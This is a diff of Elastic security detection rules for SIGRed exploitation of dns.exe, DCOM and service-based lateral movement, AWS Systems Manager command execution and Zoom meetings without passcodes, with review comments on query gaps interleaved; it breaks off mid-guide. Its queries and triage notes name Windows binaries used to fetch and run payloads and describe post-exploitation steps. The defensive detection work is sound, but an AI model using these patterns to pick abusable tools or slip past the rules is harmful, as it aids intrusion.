@@ -15,15 +15,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Child Process of dns.exe", - "note": "## Triage and analysis\n\n### Investigating Unusual Child Process\nDetection alerts from this rule indicate potential suspicious child processes spawned after exploitation from CVE-2020-1350 (SigRed) has occurred. Here are some possible avenues of investigation:\n- Any suspicious or abnormal child process spawned from dns.exe should be reviewed and investigated with care. It's impossible to predict what an adversary may deploy as the follow-on process after the exploit, but built-in discovery/enumeration utilities should be top of mind (whoami.exe, netstat.exe, systeminfo.exe, tasklist.exe).\n- Built-in Windows programs that contain capabilities used to download and execute additional payloads should also be considered. This is not an exhaustive list, but ideal candidates to start out would be: mshta.exe, powershell.exe, regsvr32.exe, rundll32.exe, wscript.exe, wmic.exe.\n- If the DoS exploit is successful and DNS Server service crashes, be mindful of potential child processes related to werfault.exe occurring.\n- Any subsequent activity following the child process spawned related to execution/network activity should be thoroughly reviewed from the endpoint.\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Child Process of dns.exe\n\nSIGRed (CVE-2020-1350) is a wormable, critical vulnerability in the Windows DNS server that affects Windows Server\nversions 2003 to 2019 and can be triggered by a malicious DNS response. 
Because the service is running in elevated\nprivileges (SYSTEM), an attacker that successfully exploits it is granted Domain Administrator rights. This can\neffectively compromise the entire corporate infrastructure.\n\nThis rule looks for unusual children of the `dns.exe` process, which can indicate the exploitation of the SIGRed or a \nsimilar remote code execution vulnerability in the DNS server.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes.\n - Any suspicious or abnormal child process spawned from dns.exe should be carefully reviewed and investigated. It's\n impossible to predict what an adversary may deploy as the follow-on process after the exploit, but built-in\n discovery/enumeration utilities should be top of mind (`whoami.exe`, `netstat.exe`, `systeminfo.exe`, `tasklist.exe`).\n - Built-in Windows programs that contain capabilities used to download and execute additional payloads should also be\n considered. This is not an exhaustive list, but ideal candidates to start out would be: `mshta.exe`, `powershell.exe`,\n `regsvr32.exe`, `rundll32.exe`, `wscript.exe`, `wmic.exe`.\n - If a denial-of-service (DoS) exploit is successful and DNS Server service crashes, be mindful of potential child processes related to\n `werfault.exe` occurring.\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file\nmodifications, and any spawned child processes.\n- Investigate other alerts associated with the host during the past 48 hours.\n- Check whether the server is vulnerable to CVE-2020-1350.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Reimage the host operating system or restore the compromised server to a clean state.\n- Install the latest patches on systems that run Microsoft DNS Server.\n- Consider the implementation of a patch management system, such as the Windows Server Update Services (WSUS).\n- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system,\npersistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type == \"start\" and process.parent.name : \"dns.exe\" and\n not process.name : \"conhost.exe\"\n", "references": [ "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", "https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/", "https://github.com/maxpl0it/CVE-2020-1350-DoS" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + 
"name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -51,5 +69,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_unusual_dns_service_file_writes.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_unusual_dns_service_file_writes.json index 43e33bf36f1cf..a814e580081f1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_unusual_dns_service_file_writes.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_unusual_dns_service_file_writes.json 
@@ -12,14 +12,32 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual File Modification by dns.exe", - "note": "## Triage and analysis\n\n### Investigating Unusual File Write\nDetection alerts from this rule indicate potential unusual/abnormal file writes from the DNS Server service process (`dns.exe`) after exploitation from CVE-2020-1350 (SigRed) has occurred. Here are some possible avenues of investigation:\n- Post-exploitation, adversaries may write additional files or payloads to the system as additional discovery/exploitation/persistence mechanisms.\n- Any suspicious or abnormal files written from `dns.exe` should be reviewed and investigated with care.\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Unusual File Write\nDetection alerts from this rule indicate potential unusual/abnormal file writes from the DNS Server service process (`dns.exe`) after exploitation from CVE-2020-1350 (SigRed) has occurred. 
Here are some possible avenues of investigation:\n- Post-exploitation, adversaries may write additional files or payloads to the system as additional discovery/exploitation/persistence mechanisms.\n- Any suspicious or abnormal files written from `dns.exe` should be reviewed and investigated with care.", "query": "file where process.name : \"dns.exe\" and event.type in (\"creation\", \"deletion\", \"change\") and\n not file.name : \"dns.log\"\n", "references": [ "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", "https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -47,5 +65,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_via_explorer_suspicious_child_parent_args.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_via_explorer_suspicious_child_parent_args.json index 814fea368d719..ee35fed5bdff9 100644 
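Review bot: The exclusion in the rewritten query line, `not file.name : "dns.log"`, matches on the bare file name, so any write by dns.exe to a file called dns.log in any directory is suppressed — including a dropped payload deliberately named to match, which is exactly the post-SigRed write this rule exists to catch. The legitimate debug log lives at a fixed location (presumably under the DNS server's System32\dns directory — confirm against endpoint data), so anchoring the exclusion on the path is tighter: `not file.path : "?:\\Windows\\System32\\dns\\dns.log"`. `file.path` would then need an entry in the `required_fields` list this hunk introduces.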
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_via_explorer_suspicious_child_parent_args.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_via_explorer_suspicious_child_parent_args.json 
@@ -12,10 +12,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Explorer Child Process", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n (\n process.name : (\"cscript.exe\", \"wscript.exe\", \"powershell.exe\", \"rundll32.exe\", \"cmd.exe\", \"mshta.exe\", \"regsvr32.exe\") or\n process.pe.original_file_name in (\"cscript.exe\", \"wscript.exe\", \"PowerShell.EXE\", \"RUNDLL32.EXE\", \"Cmd.Exe\", \"MSHTA.EXE\", \"REGSVR32.EXE\")\n ) and\n /* Explorer started via DCOM */\n process.parent.name : \"explorer.exe\" and process.parent.args : \"-Embedding\" and\n not process.parent.args:\n (\n /* Noisy CLSID_SeparateSingleProcessExplorerHost Explorer COM Class IDs */\n \"/factory,{5BD95610-9434-43C2-886C-57852CC8A120}\",\n \"/factory,{ceff45ee-c862-41de-aee2-a022c81eda92}\"\n )\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "9a5b4e31-6cde-4295-9ff7-6be1b8567e1b", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ 
"Elastic", @@ -55,5 +83,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_via_system_manager.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_via_system_manager.json index 70fadcc29f648..21181a72e2086 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_via_system_manager.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_via_system_manager.json 
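Review bot: The hunk replaces the investigation guide with `"note": ""` instead of dropping the key, while other rules touched by the same change (lateral_movement_cmd_service.json, the bifrostconsole rule) carry no `note` key at all. An empty string is presumably rendered as an empty guide in the rule details (not verified here) and makes a "has an investigation guide" check ambiguous for tooling; deleting the `"note": "",` line is cleaner. Nothing is lost by removing it, since the new `setup` field carries the same sentence the note used to hold.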
@@ -15,13 +15,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS Execution via System Manager", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS Execution via System Manager\n\nAmazon EC2 Systems Manager is a management service designed to help users automatically collect software inventory, apply\noperating system patches, create system images, and configure Windows and Linux operating systems.\n\nThis rule looks for the execution of commands and scripts using System Manager. Note that the actual contents of these\nscripts and commands are not included in the event, so analysts must gain visibility using an host-level security product.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Validate that the activity is not related to planned patches, updates, network administrator activity, or legitimate\nsoftware installations.\n- Investigate the commands or scripts using host-level visibility.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences involving other users.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Check if 
this operation was approved and performed according to the organization's change management policy.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a\ncombination of user and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:ssm.amazonaws.com and event.action:SendCommand and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/systems-manager/latest/userguide/ssm-plugins.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "37b211e8-4e2f-440f-86d8-06cc8f158cfa", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -29,7 +59,8 @@ "AWS", "Continuous Monitoring", "SecOps", - "Log Auditing" + "Log Auditing", + "Initial Access" ], "threat": [ { 
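Review bot: The new triage guide sends analysts straight to host-level tooling but never points them at the request parameters of the SendCommand event itself, which are what let them scope which instances and which SSM document were targeted before touching any host. A step before "Investigate the commands or scripts using host-level visibility" such as `- Review the SendCommand request parameters (SSM document name and target instance IDs) to identify which hosts to inspect.` would close that gap; the exact field names depend on the CloudTrail integration's mapping, so verify them before citing them in the guide. Two smaller points on the same line: `an host-level security product` should read `a host-level security product`, and because the query keeps `event.outcome:success`, denied SendCommand attempts by a compromised principal are silently out of scope — worth a sentence in the guide or a sibling low-severity rule.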
@@ -57,5 +88,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_zoom_meeting_with_no_passcode.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_zoom_meeting_with_no_passcode.json index 8c3ae88116a79..fb93e33716ef1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_zoom_meeting_with_no_passcode.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_zoom_meeting_with_no_passcode.json @@ -9,14 +9,42 @@ "language": "kuery", "license": "Elastic License v2", "name": "Zoom Meeting with no Passcode", - "note": "## Config\n\nThe Zoom Filebeat module or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.type:creation and event.module:zoom and event.dataset:zoom.webhook and\n event.action:meeting.created and not zoom.meeting.password:*\n", "references": [ "https://blog.zoom.us/a-message-to-our-users/", "https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "zoom.meeting.password", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "58ac2aa5-6718-427c-a845-5f3ac5af00ba", + "setup": "The Zoom Filebeat module or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", 
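Review bot: The query fires on `not zoom.meeting.password:*`, i.e. whenever the field is simply absent, and the `required_fields` entry added here marks `zoom.meeting.password` as non-ECS (`"ecs": false`) — so if an integration version or custom pipeline does not map that field at all, every `meeting.created` event matches and the rule becomes pure noise with nothing in the alert to say why. The new `setup` text is the right place to state this, e.g. `Events must populate zoom.meeting.password; if the field is not mapped in your pipeline, this rule will alert on every meeting created.` The opposite edge also exists: a meeting whose passcode is indexed as an empty string would not match, since the field then exists — presumably rare, but worth confirming against the webhook payload.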
@@ -46,5 +74,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 4
+ "version": 6
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_cmd_service.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_cmd_service.json
index 3ff80de634b46..3518aa955457f 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_cmd_service.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_cmd_service.json
@@ -13,6 +13,38 @@
 "license": "Elastic License v2",
 "name": "Service Command Lateral Movement",
 "query": "sequence by process.entity_id with maxspan = 1m\n [process where event.type in (\"start\", \"process_started\") and\n (process.name : \"sc.exe\" or process.pe.original_file_name : \"sc.exe\") and\n process.args : \"\\\\\\\\*\" and process.args : (\"binPath=*\", \"binpath=*\") and\n process.args : (\"create\", \"config\", \"failure\", \"start\")]\n [network where process.name : \"sc.exe\" and destination.ip != \"127.0.0.1\"]\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "destination.ip",
+ "type": "ip"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.entity_id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pe.original_file_name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc",
 "severity": "low",
@@ -85,5 +117,5 @@
 }
 ],
 "type": "eql",
- "version": 3
+ "version": 4
 }
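Review bot: The network stage of the sequence, `[network where process.name : "sc.exe" and destination.ip != "127.0.0.1"]`, excludes only IPv4 loopback, whereas the sibling sequence rules in this same change exclude both families (lateral_movement_dcom_hta.json checks `"127.0.0.1"` and `"::1"`; lateral_movement_direct_outbound_smb_connection.json uses `cidrmatch(destination.ip, "127.0.0.1", "::1")`). An `sc.exe` session that resolves the local host to its IPv6 loopback would be reported as lateral movement here. Aligning the line to `[network where process.name : "sc.exe" and not cidrmatch(destination.ip, "127.0.0.1", "::1")]` keeps the three rules consistent, and `destination.ip` is already declared in the `required_fields` this hunk adds.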
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_credential_access_kerberos_bifrostconsole.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_credential_access_kerberos_bifrostconsole.json
index 0fd10fc807846..f3a2bb02635a1 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_credential_access_kerberos_bifrostconsole.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_credential_access_kerberos_bifrostconsole.json
@@ -15,6 +15,23 @@
 "references": [
 "https://github.com/its-a-feature/bifrost"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "16904215-2c95-4ac8-bf5c-12354e047192",
 "severity": "high",
@@ -74,5 +91,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 2
+ "version": 3
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dcom_hta.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dcom_hta.json
index 50178d20af2a1..9ad0451b4a01a 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dcom_hta.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dcom_hta.json
@@ -12,10 +12,62 @@ "language": "eql", "license": "Elastic License v2", "name": "Incoming DCOM Lateral Movement via MSHTA", - "query": "sequence with maxspan=1m\n [process where event.type in (\"start\", \"process_started\") and\n process.name : \"mshta.exe\" and process.args : \"-Embedding\"\n ] by host.id, process.entity_id\n [network where event.type == \"start\" and process.name : \"mshta.exe\" and \n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port > 49151 and destination.port > 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n", + "query": "sequence with maxspan=1m\n [process where event.type in (\"start\", \"process_started\") and\n process.name : \"mshta.exe\" and process.args : \"-Embedding\"\n ] by host.id, process.entity_id\n [network where event.type == \"start\" and process.name : \"mshta.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port > 49151 and destination.port > 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n", "references": [ "https://codewhitesec.blogspot.com/2018/07/lethalhta.html" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], "risk_score": 73, "rule_id": 
"622ecb68-fa81-4601-90b5-f8cd661e4520", "severity": "high", @@ -59,7 +111,7 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/", "subtechnique": [ { @@ -73,5 +125,5 @@ } ], "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dcom_mmc20.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dcom_mmc20.json index a44185290f41d..c8c03056d5f53 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dcom_mmc20.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dcom_mmc20.json @@ -16,6 +16,63 @@ "references": [ "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], "risk_score": 73, "rule_id": "51ce96fb-9e52-4dad-b0ba-99b54440fc9a", "severity": "high", @@ -51,5 +108,5 @@ } ], "type": "eql", - "version": 5 + "version": 6 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dcom_shellwindow_shellbrowserwindow.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dcom_shellwindow_shellbrowserwindow.json index aed31f6b2f903..cca0c29958236 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dcom_shellwindow_shellbrowserwindow.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dcom_shellwindow_shellbrowserwindow.json @@ -16,6 +16,63 @@ "references": [ "https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], "risk_score": 47, "rule_id": "8f919d4b-a5af-47ca-a594-6be59cd924a4", "severity": "medium", @@ -51,5 +108,5 @@ } ], "type": "eql", - "version": 5 + "version": 6 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.json
index 25b6e42b2312f..dd55e8e459519 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.json
@@ -15,6 +15,18 @@
 "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/",
 "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-restrict-anonymous-access-to-named-pipes-and-shares"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "registry.data.strings",
+ "type": "wildcard"
+ },
+ {
+ "ecs": true,
+ "name": "registry.path",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "ddab1f5f-7089-44f5-9fda-de5b11322e77",
 "severity": "medium",
@@ -51,5 +63,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 2
+ "version": 3
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_direct_outbound_smb_connection.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_direct_outbound_smb_connection.json
index c9983d2ba186e..3c2dad390ebbd 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_direct_outbound_smb_connection.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_direct_outbound_smb_connection.json
@@ -12,7 +12,35 @@ "language": "eql", "license": "Elastic License v2", "name": "Direct Outbound SMB Connection", + "note": "## Triage and analysis\n\n### Investigating Direct Outbound SMB Connection\n\nThis rule looks for unexpected processes making network connections over port 445. Windows file sharing is typically\nimplemented over Server Message Block (SMB), which communicates between hosts using port 445. When legitimate, these\nnetwork connections are established by the kernel (PID 4). Occurrences of non-system processes using this port can indicate\nport scanners, exploits, and tools used to move laterally on the environment.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file\nmodifications, and any spawned child processes.\n- Retrieve the process executable and determine if it is malicious:\n - Use a private sandboxed 